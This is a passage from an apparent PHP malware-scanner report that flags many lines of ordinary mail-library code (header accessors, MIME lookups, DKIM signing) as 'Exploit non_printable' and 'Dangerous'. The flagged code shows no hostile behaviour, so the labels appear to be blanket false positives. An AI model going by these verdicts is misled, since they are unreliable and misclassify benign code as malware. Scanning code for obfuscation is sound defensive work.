</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3671</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3693</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3911</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3972</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4029</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4054</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
